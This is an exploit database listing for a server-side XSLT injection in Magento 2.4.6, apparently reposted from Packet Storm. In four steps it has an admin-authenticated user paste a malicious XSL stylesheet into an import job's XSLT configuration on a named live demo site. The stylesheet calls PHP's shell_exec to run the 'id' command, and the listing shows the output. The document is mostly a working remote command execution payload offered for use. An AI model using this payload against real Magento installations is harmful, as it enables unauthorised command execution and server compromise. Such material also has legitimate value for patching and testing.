Share
## https://sploitus.com/exploit?id=PACKETSTORM:175793
Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection  
# Date: 2023-11-17  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://magento2demo.firebearstudio.com/  
# Software Link: https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip  
# Version: 2.4.6  
# Tested on: 2.4.6  
  
POC:  
  
1 ) Enter with admin creds this url : https://magento2demo.firebearstudio.com/  
2 ) Click SYSTEM > Import Jobs > Entity Type Widget > click edit   
3 ) Click XSLT Configuration and write this payload :   
  
<?xml version="1.0" encoding="utf-8"?>  
<xsl:stylesheet version="1.0"  
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  
xmlns:php="http://php.net/xsl" >  
<xsl:template match="/">  
<xsl:value-of select="php:function('shell_exec','id')" />  
</xsl:template>  
</xsl:stylesheet>  
  
4 ) Click Test XSL Template , You will be see "id" command result :  
  
<?xml version="1.0"?>  
uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)